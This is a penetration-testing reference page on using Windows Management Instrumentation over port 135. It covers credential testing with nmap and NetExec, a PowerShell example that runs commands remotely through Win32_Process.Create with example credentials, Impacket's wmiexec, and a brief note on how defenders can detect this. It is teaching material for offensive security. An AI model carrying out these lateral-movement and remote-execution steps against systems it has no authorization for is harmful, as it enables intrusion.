135 - WMI
Windows Management Instrumentation (WMI) is a Windows feature that allows administrators to remotely manage and monitor systems. It is used to query system information, configure settings, execute commands, and automate administrative tasks across local or remote machines.
By default, WMI uses DCOM for remote communication. The client first contacts the RPC endpoint mapper on TCP port 135, which hands it a dynamically assigned high port (49152–65535 on modern Windows) where the actual WMI traffic is exchanged. Because of this second, unpredictable port, a firewall that only allows 135 will not let remote WMI through. Remote WMI access normally requires membership in the target's local Administrators group; for local (non-domain) accounts other than the built-in Administrator, UAC remote token filtering blocks access unless LocalAccountTokenFilterPolicy is set to 1 or specific namespace and DCOM permissions have been delegated.
Enumeration
# Scan ports (135 plus the dynamic RPC range; -sV over the whole high range is slow, so narrow it once you know the open ports)
nmap -p135,49152-65535 10.129.229.244 -sV
# Test credentials over WMI
nxc wmi 10.129.229.244 -u helen -p RedRiot88
Lateral Movement
Windows
wmic.exe is deprecated as of Windows 10 21H1 and is no longer installed by default on recent Windows 11 builds; the PowerShell cmdlets supersede it.
The legacy WMI cmdlets (Get-WmiObject, Invoke-WmiMethod) were removed in PowerShell 6+ and replaced with the CIM cmdlets (Get-CimInstance, Invoke-CimMethod), which also work in Windows PowerShell 5.1.
We can interact with WMI using wmic.exe or the PowerShell cmdlets to query and manage aspects of the Windows operating system programmatically through different classes, for example:
Win32_OperatingSystem: details about the operating system
Win32_Process: list, create and terminate processes
Win32_Service: query, start and stop services
Win32_ComputerSystem: overall system information (hostname, domain, hardware)
We can also use WMI for remote code execution: the Create method of Win32_Process starts an arbitrary command on the target, which is how the wmiexec-style tools below work. The same channel covers admin tasks such as managing processes, running scripts, or changing system configuration.
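The following is an added example, not code from the original page, showing the CIM cmdlets against the classes listed above, a remote session that explicitly uses DCOM (the RPC/135 plus dynamic-port channel described in the introduction) and command execution through Win32_Process.Create. The target address and the helen / RedRiot88 credentials are taken from the enumeration section and are assumed to belong to a local administrator on the target; the output file path is an assumption.

```powershell
# Added example (not part of the original page).
# Assumptions: 10.129.229.244 and helen/RedRiot88 come from the enumeration
# section above; helen is a local admin on the target; C:\Windows\Temp\out.txt
# is an arbitrary path chosen here.
$Target = '10.129.229.244'
$Cred   = New-Object System.Management.Automation.PSCredential(
    'helen', (ConvertTo-SecureString 'RedRiot88' -AsPlainText -Force))

# Local queries against the four classes from the table; -Filter takes WQL.
Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, LastBootUpTime
Get-CimInstance Win32_ComputerSystem  | Select-Object Name, Domain, TotalPhysicalMemory
Get-CimInstance Win32_Service -Filter "State='Running'" | Select-Object Name, StartName, PathName
Get-CimInstance Win32_Process -Filter "Name='lsass.exe'" | Select-Object ProcessId, ExecutablePath

# Remote: the CIM cmdlets default to WinRM (TCP 5985). Request DCOM explicitly
# so the traffic goes over RPC/135 and a dynamic high port instead.
$Opt     = New-CimSessionOption -Protocol Dcom
$Session = New-CimSession -ComputerName $Target -Credential $Cred -SessionOption $Opt

Get-CimInstance -CimSession $Session -ClassName Win32_OperatingSystem |
    Select-Object CSName, Caption, Version

# Remote execution via Win32_Process.Create. WMI only returns the PID and a
# status code, not stdout, so the command's output has to be redirected to a
# file (or sent back some other way) and collected separately.
$r = Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create `
        -Arguments @{ CommandLine = 'cmd.exe /c whoami > C:\Windows\Temp\out.txt' }
if ($r.ReturnValue -eq 0) {
    "Process started on $Target with PID $($r.ProcessId)"
} else {
    # 2 = access denied, 8 = unknown failure, 9 = path not found, 21 = invalid parameter
    "Win32_Process.Create failed with ReturnValue $($r.ReturnValue)"
}

Remove-CimSession $Session
```

On the defender's side, this is the pattern that shows up in the Microsoft-Windows-WMI-Activity/Operational log and as WmiPrvSE.exe spawning cmd.exe on the target; a client needing only 135 plus one dynamic port and no SMB session is the reason WMI is popular for lateral movement when 445 is filtered.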
Linux
The wmi-client package (a Samba-based port that installs a Linux wmic binary) allows remote communication with Windows systems using WMI. It connects to Windows machines over DCOM and RPC, the same Microsoft technologies the native client uses, and can run WQL queries or management tasks. It is old and unmaintained, was written against Windows 2000, XP and Server 2003, and may fail against modern targets, so treat it as a fallback.
Impacket's wmiexec.py can also be used for RCE. It launches the command through Win32_Process.Create and, by default, reads the output back from a file on the ADMIN$ share, so it additionally needs SMB (TCP 445) open; with -nooutput it runs the command blind without creating an SMB connection.
NetExec can also be used to query information or get RCE via WMI. This tool retrieves the command output via WMI rather than SMB, so it works when 445 is filtered but 135 and the dynamic RPC ports are reachable.